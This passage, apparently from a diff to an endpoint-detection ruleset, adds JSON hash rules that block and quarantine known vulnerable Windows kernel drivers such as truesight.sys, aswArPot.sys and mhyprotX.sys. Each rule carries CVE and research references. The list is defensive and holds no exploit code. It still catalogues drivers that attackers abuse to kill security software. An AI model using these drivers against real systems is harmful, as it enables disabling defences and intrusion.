"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819743Z", + "creation_date": "2026-03-23T11:45:30.819745Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819750Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "ae3a6a0726f667658fc3e3180980609dcb31bdbf833d7cb76ba5d405058d5156", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8011e70b-92dc-56c8-ad91-7b83c970a2d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153524Z", + "creation_date": "2026-03-23T11:45:31.153526Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153532Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0878201bd1efa4c49a78d317d80a63778e501f4047e2d21784692a88ab2eb2d8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80337d1f-2212-5313-b400-21e2c955bae3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621863Z", + "creation_date": "2026-03-23T11:45:29.621865Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621883Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e955e57f078a2c0de7d113e85859bb3e0fcac772a5a1b9b9709a90a86ef4cd5", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "803707d2-e087-506b-9f1a-dd84f971aca8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828333Z", + "creation_date": "2026-03-23T11:45:31.828336Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828344Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "258d710911124ef857fd95e17754327c18442364a35c102f7e9fcb9fe4a1dbfb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8037e9f8-2545-5978-8b6b-d11783d02a08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824421Z", + "creation_date": "2026-03-23T11:45:30.824423Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824428Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e344e75f109f239594ef460dd71465830f14eb4c6001a9d36af76ccc51ed7cc7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8040f2f3-c2a7-529d-a564-9e9f9b123ba3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826367Z", + "creation_date": 
"2026-03-23T11:45:31.826369Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826374Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d217c8e84ce38732611fdd26a28f0a1f5d216b885ea3650d6c70d107c9dd44db", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8041b3a8-dea2-5c12-95f7-2c3c144ee9b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969888Z", + "creation_date": "2026-03-23T11:45:29.969890Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8b5fddf52551259d7d936283aa4fdc4579c5e4b030a11267496cdbdc143e15b", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"8043e944-c2f3-531c-a4e6-5b0031bdd650", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808294Z", + "creation_date": "2026-03-23T11:45:31.808297Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808306Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "32a53835967cc3690dede58d9e7e006cfda9730e26418a6a37750a7bc6a07d6f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8058a5f6-dc8e-5f28-b2cd-4eab04b54784", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487523Z", + "creation_date": "2026-03-23T11:45:31.487525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.487530Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eaab0a8078b14e108dea51525b4b91acc28526337f06e9dd272c22242ddfe74b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8059b119-1dd6-578f-a40b-dfa198dde249", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618566Z", + "creation_date": "2026-03-23T11:45:29.618568Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618576Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51dbf446deb54beb8aef1de11e0f868ac062a9db0c31d0e16eff99203aec86a9", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8063326e-1b72-5c8a-b5cf-bd1930fe5280", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143297Z", + "creation_date": "2026-03-23T11:45:32.143299Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143305Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ecd6e879e5521ca4053a59ef6682a95d97f6d9ba75f313b87bd133afe5267852", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8065ab1e-139d-5cd0-b620-ac1c59aab364", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.496008Z", + "creation_date": "2026-03-23T11:45:31.496011Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.496020Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, 
+ "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07e98ca630e107adec07257ad17740d5da20a66513edf9174560fdf8c8bd6102", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "806f3e88-faf8-5503-82a8-2a6f2f3bd0f3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825164Z", + "creation_date": "2026-03-23T11:45:31.825167Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb9577d0beee89bf57531a916a88085fb21a1ca8f217cbcdd2d9eb10395ec4c9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "807157a0-211c-5ac3-b3d0-fc4571c3fdb5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157170Z", + "creation_date": "2026-03-23T11:45:31.157172Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157178Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a0f964dcc6e887a09959da6a0056b7ba4fdfa5f06869e3f9781f1836764afcf4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "807852ac-62f7-5ffb-9e7c-a0e26320862e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475072Z", + "creation_date": "2026-03-23T11:45:30.475075Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475084Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab6c6a6a4d7ae58cbbc63283699aaf59cf6ecddf56eba0933178732f2664abcd", 
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80818bdb-dfd8-5f2c-a088-af2aa8e3fce3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829893Z", + "creation_date": "2026-03-23T11:45:31.829895Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829900Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ef42bd4b8f14f025fb220ed9a45aab6cd3fd8cc282042bd4d601ebfe7865fe7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8087457e-1df1-58ee-a611-09641e2f9e54", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.476020Z", + "creation_date": "2026-03-23T11:45:31.476024Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476034Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f18cd5a57c83f7254c0e376fc713a387ba5b800a272c2013870bd5d4e483fdd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80994992-ad77-5142-b9e2-71858df38492", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160738Z", + "creation_date": "2026-03-23T11:45:31.160740Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43e5c2e6aa753481f5a98f25d2369a8dde994a33f7780884c4669bf6b0327ffd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "809b8951-1dfe-567f-b531-1dbe279faa14", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614178Z", + "creation_date": "2026-03-23T11:45:29.614180Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614185Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae42afa9be9aa6f6a5ae09fa9c05cd2dfb7861dc72d4fd8e0130e5843756c471", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80a8b2a7-9d7f-5650-a3f3-4c7fb2974b75", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611864Z", + "creation_date": "2026-03-23T11:45:29.611866Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.611882Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26d69e677d30bb53c7ac7f3fce76291fe2c44720ef17ee386f95f08ec5175288", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80a9b8ca-1603-5cff-826b-3ff270d37cda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141921Z", + "creation_date": "2026-03-23T11:45:31.141923Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141928Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e8dd1f4de4e4cc11d3f6ca90d2f247df53aceec3e785a6245b35c98bc509d3b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80af64e7-9c8a-5749-a901-e9528ce65a37", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812544Z", + "creation_date": "2026-03-23T11:45:31.812546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812552Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b858eda9816986ec170cb5fa8f2bbf807c77a46430264b68a379e568a788bc6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80b19be8-d030-5950-8d92-4ecfd72a5738", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978475Z", + "creation_date": "2026-03-23T11:45:29.978477Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978483Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18dfe852fade6625862cc963922c1f2389a296af96df11eb7b62bbeddd61e18a", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80bb6ad6-e9ea-53ed-a5a3-11f2423884a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151569Z", + "creation_date": "2026-03-23T11:45:31.151572Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151582Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4053661f7153f5305e9aa491c003b2025e2b8ed96a9cf83d539916fe52b8bf8b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "80c0fccb-c742-5b2d-934c-2b2d8c450dc1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
